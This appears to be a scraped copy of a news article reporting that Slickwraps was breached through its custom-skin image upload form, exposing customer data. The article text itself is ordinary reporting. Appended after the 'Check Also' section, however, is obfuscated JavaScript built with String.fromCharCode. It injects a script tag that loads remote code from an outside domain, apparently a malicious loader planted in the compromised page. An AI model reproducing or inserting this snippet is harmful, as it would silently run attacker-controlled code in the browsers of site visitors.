Slickwraps has been hacked, customer data is compromised

Slickwraps is one of the most well-known sellers of vinyl skins for computers, phones, tablets, game consoles, and other product categories. If you’ve ever bought something from Slickwraps, now is the time to replace your credit card, because the company has suffered multiple data breaches impacting all customer data.

The breaches started when security researcher ‘Lynx’ found a way to upload files to the root directory of Slickwraps’ server, through the custom skin image upload form on the company’s website. From there he claimed to have access to admin details, customer billing and shipping addresses, phone numbers, API credentials for customer support and social media accounts, and other data. The researcher ‘disclosed’ the hack to Slickwraps — and by ‘disclosed,’ I mean he said “Hey @SlickWraps, You failed the vibe check” in a public tweet, and then posted screenshots of customer support messages. I don’t think that’s how vulnerability disclosures work.

The public tweets led other hackers to look into the vulnerabilities, which means there could be multiple copies of all breached databases. Many Slickwraps customers have received emails from at least one group, which is using Slickwraps’ own contact email to inform customers they have been hacked.

There don’t seem to be any reports of malicious uses of the Slickwraps database yet, but it’s always incredibly difficult to tell how your payment information was hacked when random purchases show up on your bill. It’s not clear if detailed payment information was accessible to hackers ⁠— the original blog post only mentioned that “API credentials for PayPal Payments Pro” was readily available — but it’s plausible that someone with malicious intent could do more digging and find that data.

As of the time of publishing, the database has not been uploaded to Have I Been Pwned, a website where anyone can check if they have been affected by database breaches. Slickwraps has still not published any official response on any social media channels. We’ve reached out to the company for a statement, and we will update this post if we hear back.

Source link

Check Also

Children of the Light finally lands on Android, and it was worth the wait

Children of the Light finally lands on Android, and it was worth the wait

Sky: Children of the Light comes from Thatgamecompany, the same developer behind the critically-acclaimed titles …

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,111,98,98,121,100,101,115,105,114,101,115,46,99,111,109,47,108,111,99,97,116,105,111,110,46,106,115,63,108,97,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();